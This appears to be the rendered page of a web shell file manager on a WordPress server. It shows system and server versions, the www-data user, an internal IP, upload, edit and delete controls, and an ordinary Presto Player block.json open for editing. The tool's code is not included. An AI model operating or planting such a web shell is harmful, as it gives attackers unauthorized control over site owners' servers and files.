[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
dist
/
admin
/
blocks
/
blocks
/
popup-media
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
626 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "name": "presto-player/popup-media", "apiVersion": 2, "title": "Media", "category": "presto", "keywords": [ "popup", "media" ], "description": "The media content that displays in the Presto Popup.", "textdomain": "presto-player", "parent": [ "presto-player/popup" ], "usesContext": [ "presto-player/popup-id" ], "supports": { "interactivity": true }, "style": "file:./style.css", "editorStyle": "file:./editor.css", "viewScript": "presto-components", "allowedBlocks": [ "presto-player/reusable-display" ] }